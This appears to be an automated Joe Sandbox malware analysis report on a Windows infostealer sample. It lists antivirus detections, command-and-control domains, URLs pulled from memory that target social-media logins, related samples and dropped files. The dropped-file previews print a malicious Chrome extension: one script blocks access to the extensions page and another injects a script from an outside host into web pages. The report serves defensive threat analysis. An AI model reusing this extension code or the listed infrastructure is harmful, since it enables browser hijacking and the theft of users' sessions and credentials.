C:\Users\user\AppData\Local\Temp\download\msvcr71.dll | 3% | ReversingLabs |  |
C:\Users\user\AppData\Local\Temp\download\zlib1.dll | 0% | Metadefender |  | Browse
C:\Users\user\AppData\Local\Temp\download\zlib1.dll | 0% | ReversingLabs |  |
C:\Users\user\AppData\Local\Temp\xldl.dll | 3% | Metadefender |  | Browse
C:\Users\user\AppData\Local\Temp\xldl.dll | 0% | ReversingLabs |  |
C:\Users\user\AppData\Roaming\1611970727133.exe | 3% | Metadefender |  | Browse
C:\Users\user\AppData\Roaming\1611970727133.exe | 14% | ReversingLabs | Win32.Infostealer.EdgeCookiesView |

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs


Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
84CFBA021A5A6662.xyz | 104.21.23.16 | true | false |  | unknown
84cfba021a5a6662.xyz | 104.21.23.16 | true | false |  | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://84cfba021a5a6662.xyz/info_old/g | false | Avira URL Cloud: safe | unknown
http://84cfba021a5a6662.xyz/info_old/e | false | Avira URL Cloud: safe | unknown
http://84cfba021a5a6662.xyz/info_old/w | false | Avira URL Cloud: safe | unknown
http://84cfba021a5a6662.xyz/info_old/r | false | Avira URL Cloud: safe | unknown
http://84cfba021a5a6662.xy/info_old/w | false | Avira URL Cloud: safe | unknown
http://84CFBA021A5A6662.xyz/info_old/ddd | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

                                        unknown
                                        https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%26272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpfalse
                                          high
                                          http://84CFBA021A5A6662.xyz/6272167835D47591.exe, 00000004.00000003.273221994.0000000004191000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpfalse
                                            high
                                            https://www.instagram.com/6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/soap/encoding/download_engine.dll.2.drfalse
                                                high
                                                http://www.xunlei.com/GETdownload_engine.dll.2.drfalse
                                                  high
                                                  https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eeeecv37E8.tmp.9.drfalse
                                                    high
                                                    https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.cecv37E8.tmp.9.drfalse
                                                      high
                                                      https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://images.outbrainimg.com/transform/v3/eyJpdSI6ImY3MDA1MDJkMTdmZDY0M2VkZTBjNzg5MTE1OWEyYTYxMWRiNecv37E8.tmp.9.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.messenger.com/origin:6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=6272167835D47591.exe, 00000002.00000003.288462252.00000000007E8000.00000004.00000001.sdmp, Localwebdata1611970737633.2.drfalse
                                                            high
                                                            http://pki.goog/gsr2/GTS1O1.crt0ecv37E8.tmp.9.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1ecv37E8.tmp.9.drfalse
                                                              high
                                                              https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xmlecv37E8.tmp.9.drfalse
                                                                high
                                                                https://contextual.media.net/ecv37E8.tmp.9.drfalse
                                                                  high
                                                                  http://ocsp.pki.goog/gsr202ecv37E8.tmp.9.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookieecv37E8.tmp.9.drfalse
                                                                    high
                                                                    https://pki.goog/repository/0ecv37E8.tmp.9.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1ecv37E8.tmp.9.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://api.twitter.com/1.1/statuses/update.json6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9ecv37E8.tmp.9.drfalse
                                                                        high
                                                                        http://www.msn.com/ecv37E8.tmp.9.drfalse
                                                                          high
                                                                          https://upload.twitter.com/i/media/upload.json6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://www.cloudflare.com/5xx-error-landingN1yprTBBXs.exe, 00000000.00000002.268429575.0000000002C85000.00000004.00000040.sdmp, 6272167835D47591.exe, 00000002.00000003.287668875.0000000004150000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.273221994.0000000004191000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734ecv37E8.tmp.9.drfalse
                                                                                high
                                                                                https://twitter.com/compose/tweetsec-fetch-mode:6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://84CFBA021A5A6662.xyz/info_old/w6272167835D47591.exe, 00000002.00000003.344625053.0000000000BA7000.00000004.00000040.sdmpfalse
                                                                                    unknown
                                                                                    https://www.messenger.com/accept:6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804ecv37E8.tmp.9.drfalse
                                                                                        high
                                                                                        https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3ecv37E8.tmp.9.drfalse
                                                                                          high
                                                                                          https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.jsecv37E8.tmp.9.drfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://contextual.media.net/48/nrrV18753.jsecv37E8.tmp.9.drfalse
                                                                                            high
                                                                                            http://crl.pki.goog/gsr2/gsr2.crl0?ecv37E8.tmp.9.drfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://84CFBA021A5A6662.xyz/info_old/g6272167835D47591.exe, 00000002.00000003.344625053.0000000000BA7000.00000004.00000040.sdmpfalse
                                                                                              unknown
                                                                                              http://pki.goog/gsr2/GTSGIAG3.crt0)ecv37E8.tmp.9.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=06272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://feedback.googleusercontent.com6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.272318191.0000000004187000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://www.xunlei.com/download_engine.dll.2.drfalse
                                                                                                    high
                                                                                                    http://pki.goog/gsr2/GTS1O1.crt0#ecv37E8.tmp.9.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://aefd.nelreports.net/api/report?cat=bingthecv37E8.tmp.9.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/soap/envelope/download_engine.dll.2.drfalse
                                                                                                        high
                                                                                                        https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        low
                                                                                                        https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationecv37E8.tmp.9.drfalse
                                                                                                          high
                                                                                                          https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsecv37E8.tmp.9.drfalse
                                                                                                            high
                                                                                                            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbfecv37E8.tmp.9.drfalse
                                                                                                              high
                                                                                                              https://duckduckgo.com/chrome_newtabH6272167835D47591.exe, 00000002.00000003.288462252.00000000007E8000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://curl.haxx.se/docs/http-cookies.html6272167835D47591.exe, 00000002.00000002.353010517.00000000034BF000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280539335.000000000344F000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.openssl.org/support/faq.htmldownload_engine.dll.2.drfalse
                                                                                                                    high
                                                                                                                    https://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_333%2Cw_311%2Cc_fill%2Cg_faces:autecv37E8.tmp.9.drfalse
                                                                                                                      high
                                                                                                                      http://www.winimage.com/zLibDllresource://scrollbar_u_h.pngresource://scrollbar_d_h.pngresource://scN1yprTBBXs.exefalse
                                                                                                                        high
                                                                                                                        http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tLecv37E8.tmp.9.drfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://www.instagram.comsec-fetch-mode:6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://www.instagram.com/accounts/login/ajax/facebook/6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96eecv37E8.tmp.9.drfalse
                                                                                                                            high
                                                                                                                            http://crl.thawte.com/ThawteTimestampingCA.crl0N1yprTBBXs.exefalse
                                                                                                                              high
                                                                                                                              https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2ecv37E8.tmp.9.drfalse
                                                                                                                                high
                                                                                                                                https://www.instagram.com/sec-fetch-site:6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://twitter.comReferer:6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://84CFBA021A5A6662.xyz/#y6272167835D47591.exe, 00000004.00000003.273221994.0000000004191000.00000004.00000001.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.interestvideo.com/video1.php6272167835D47591.exe, 00000004.00000002.280539335.000000000344F000.00000004.00000001.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://www.instagram.com/accept:6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://A5D4CE54CC78B3CA.xyz/t6272167835D47591.exe, 00000002.00000003.344625053.0000000000BA7000.00000004.00000040.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://www.messenger.com/login/nonce/6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://cvision.media.net/new/300x194/2/138/47/25/3b2da2d4-7a38-47c3-b162-f33e769f51f5.jpg?v=9ecv37E8.tmp.9.drfalse
                                                                                                                                        high
                                                                                                                                        https://srtb.msn.com/auction?a=de-ch&b=623d43496a394c99b1336ff5cc139eb9&c=MSN&d=http%3A%2F%2Fwww.msnecv37E8.tmp.9.drfalse
                                                                                                                                          high
                                                                                                                                          http://www.youtube.com6272167835D47591.exefalse
                                                                                                                                            high

Contacted IPs

Public

IP:104.21.23.16
Domain:unknown
Country:United States
ASN:13335
ASN Name:CLOUDFLARENETUS
Malicious:false

Private

IP:127.0.0.1

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:346123
Start date:29.01.2021
Start time:17:37:39
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 14m 25s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:N1yprTBBXs.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:Run with higher sleep bypass
Number of analysed new started processes analysed:40
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal93.bank.troj.spyw.evad.winEXE@32/37@4/2
                                                                                                                                            EGA Information:Failed
                                                                                                                                            HDC Information:
                                                                                                                                            • Successful, ratio: 34.2% (good quality ratio 32.7%)
                                                                                                                                            • Quality average: 82.3%
                                                                                                                                            • Quality standard deviation: 26.4%
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 58%
                                                                                                                                            • Number of executed functions: 84
                                                                                                                                            • Number of non-executed functions: 311
                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Adjust boot time
                                                                                                                                            • Enable AMSI
                                                                                                                                            • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                            Warnings:
                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                            • Excluded IPs from analysis (whitelisted): 104.43.193.48, 104.42.151.234, 23.211.6.115, 23.210.248.85, 51.11.168.160, 2.20.142.209, 2.20.142.210, 51.103.5.159, 51.104.139.180, 92.122.213.194, 92.122.213.247, 20.54.26.129, 52.155.217.156
                                                                                                                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, emea1.wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net
                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                            Simulations

                                                                                                                                            Behavior and APIs

                                                                                                                                            No simulations

                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                            IPs

Match | Associated Sample Name / URL | Detection | Context
104.21.23.16 | Cyfj6XGbkd.exe | malicious | 84CFBA021A5A6662.xyz/info_old/ddd
104.21.23.16 | FileSetup-v17.04.41.exe | malicious | 84CFBA021A5A6662.xyz/info_old/ddd
104.21.23.16 | FileSetup-v17.04.41.exe | malicious | 84CFBA021A5A6662.xyz/info_old/ddd

                                                                                                                                            Domains

Match | Associated Sample Name / URL | Detection | Context
84CFBA021A5A6662.xyz | Cyfj6XGbkd.exe | malicious | 104.21.23.16
84CFBA021A5A6662.xyz | N1yprTBBXs.exe | malicious | 172.67.208.74
84CFBA021A5A6662.xyz | FileSetup-v17.04.41.exe | malicious | 104.21.23.16
84CFBA021A5A6662.xyz | FileSetup-v17.04.41.exe | malicious | 104.21.23.16
84cfba021a5a6662.xyz | Cyfj6XGbkd.exe | malicious | 104.21.23.16
84cfba021a5a6662.xyz | N1yprTBBXs.exe | malicious | 172.67.208.74
84cfba021a5a6662.xyz | FileSetup-v17.04.41.exe | malicious | 104.21.23.16
84cfba021a5a6662.xyz | FileSetup-v17.04.41.exe | malicious | 104.21.23.16

                                                                                                                                            ASN

Match | Associated Sample Name / URL | Detection | Context
CLOUDFLARENETUS | Cyfj6XGbkd.exe | malicious | 104.21.23.16
CLOUDFLARENETUS | Royalmail-Shipment.xls | malicious | 172.67.1.225
CLOUDFLARENETUS | N1yprTBBXs.exe | malicious | 172.67.208.74
CLOUDFLARENETUS | Royalmail-Shipment.xls | malicious | 172.67.1.225
CLOUDFLARENETUS | PO#PDT28394209.exe | malicious | 172.67.176.199
CLOUDFLARENETUS | c8TrAKsz0T.exe | malicious | 104.21.47.75
CLOUDFLARENETUS | FileSetup-v17.04.41.exe | malicious | 104.21.23.16
CLOUDFLARENETUS | RddH6rLRfH.exe | malicious | 104.21.27.240
CLOUDFLARENETUS | Immuni.apk | malicious | 172.64.100.5
CLOUDFLARENETUS | FileSetup-v17.04.41.exe | malicious | 104.21.23.16
CLOUDFLARENETUS | UGPK60taH6.dll | malicious | 104.20.184.68
CLOUDFLARENETUS | 4PDNbYK5fj.exe | malicious | 172.67.169.213
CLOUDFLARENETUS | pmTdQ57tvM.exe | malicious | 172.67.169.213
CLOUDFLARENETUS | 7BtV39hziI.exe | malicious | 104.21.27.240
CLOUDFLARENETUS | dc4AaqW6Aa.exe | malicious | 104.21.27.240
CLOUDFLARENETUS | lAy87VNPiL.exe | malicious | 104.21.27.240
CLOUDFLARENETUS | 97aa4Ywd9y.exe | malicious | 104.21.27.240
CLOUDFLARENETUS | wuRBlQt0Tz.exe | malicious | 172.67.169.213
CLOUDFLARENETUS | 4GRuinub4a.exe | malicious | 172.67.169.213
CLOUDFLARENETUS | v8c1m9dW8G.exe | malicious | 172.67.169.213

                                                                                                                                            JA3 Fingerprints

                                                                                                                                            No context

                                                                                                                                            Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Local\Temp\MSI1983.tmp | Cyfj6XGbkd.exe | malicious
C:\Users\user\AppData\Local\Temp\MSI1983.tmp | N1yprTBBXs.exe | malicious
C:\Users\user\AppData\Local\Temp\MSI1983.tmp | FileSetup-v17.04.41.exe | malicious
C:\Users\user\AppData\Local\Temp\MSI1983.tmp | FileSetup-v17.04.41.exe | malicious
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | Cyfj6XGbkd.exe | malicious
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | N1yprTBBXs.exe | malicious
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | FileSetup-v17.04.41.exe | malicious
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | FileSetup-v17.04.41.exe | malicious
C:\Users\user\AppData\Local\Temp\6272167835D47591.exe | N1yprTBBXs.exe | malicious

                                                                                                                                                              Created / dropped Files

                                                                                                                                                              C:\Users\user\AppData\Local\Cookies1611970726289
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20480
                                                                                                                                                              Entropy (8bit):0.698304057893793
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                                                                                                                              MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                                                                                                                              SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                                                                                                                              SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                                                                                                                              SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              C:\Users\user\AppData\Local\Cookies1611970737289
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20480
                                                                                                                                                              Entropy (8bit):0.698304057893793
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                                                                                                                              MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                                                                                                                              SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                                                                                                                              SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                                                                                                                              SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\background.js
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):886
                                                                                                                                                              Entropy (8bit):5.022683940423506
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:sFfWxmARONJTW0/I8/lZ9OKMmA6eiH4MmDCvTV3u4:sYo/NJ/7Augi8Dy
                                                                                                                                                              MD5:FEDACA056D174270824193D664E50A3F
                                                                                                                                                              SHA1:58D0C6E4EC18AB761805AABB8D94F3C4CBE639F5
                                                                                                                                                              SHA-256:8F538ED9E633D5C9EA3E8FB1354F58B3A5233F1506C9D3D01873C78E3EB88B8D
                                                                                                                                                              SHA-512:2F1968EDE11B9510B43B842705E5DDAC4F85A9E2AA6AEE542BEC80600228FF5A5723246F77C526154EB9A00A87A5C7DDD634447A8F7A97D6DA33B94509731DBC
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: $(function() {..chrome.tabs.onSelectionChanged.addListener(function(tab,info){....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;....console.log(pageUrl);....if (Number(pageUrl.indexOf("extensions")) > 1) ....{....chrome.tabs.update({url:'https://chrome.google.com/webstore/category/extension'}); ....}. .... ...});.});....chrome.webRequest.onBeforeRequest.addListener(function(details) {....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;...});........var url = details.url;...}, {...urls : [ "<all_urls>" ]..}, [ "blocking" ]);...function sendMessageToContentScript(message, callback) {...chrome.tabs.query({....active : true,....currentWindow : true...}, function(tabs) {....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {.....if (callback)......callback(response);....});...});..}...});
                                                                                                                                                              C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\book.js
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):152
                                                                                                                                                              Entropy (8bit):5.039480985438208
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:2LGffWpnYOJRyRmgO9lNCaVpveLWCfKVsSdDXaDQTNUHWSpHovJiRzlLBche:2LGXWpn7J8mgO9l3BeiCfLSdDYGNeW7u
                                                                                                                                                              MD5:30CBBF4DF66B87924C75750240618648
                                                                                                                                                              SHA1:64AF3DD53D6DED500863387E407F876C89A29B9A
                                                                                                                                                              SHA-256:D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
                                                                                                                                                              SHA-512:8117B8537A0B5F4BB3ED711D9F062E7A901A90FD3D2CF9DFFCC15D03ED4E001991BA2C79BCA072FA7FD7CE100F38370105D3CE76EB87F2877C0BF18B4D8CFBAB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: (function(){.. var s = document.createElement('script'); .. s.src = '//kellyfight.com/22aff56f45f6b36dec.js'; .. document.body.appendChild(s);..})();
                                                                                                                                                              C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\icon.png
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1161
                                                                                                                                                              Entropy (8bit):7.79271055262892
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:2mEKEvFZonmDzTaC6EU1yPj0bhJKaurzF3LvLIeR2D+JGP6A8UJ0wrBI4ez:DExZomDXe1yPYHKNx3LvLvWFP6noFy4M
                                                                                                                                                              MD5:5D207F5A21E55E47FCCD8EF947A023AE
                                                                                                                                                              SHA1:3A80A7CF3A8C8F9BDCE89A04239A7E296A94160F
                                                                                                                                                              SHA-256:4E8CE139D89A497ADB4C6F7D2FFC96B583DA1882578AB09D121A459C5AD8335F
                                                                                                                                                              SHA-512:38436956D5414A2CF66085F290EF15681DBF449B453431F937A09BFE21577252565D0C9FA0ACEAAD158B099383E55B94C721E23132809DF728643504EFFCBE2B
                                                                                                                                                              Malicious:false
                                                                                                                                                              C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\icon48.png
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
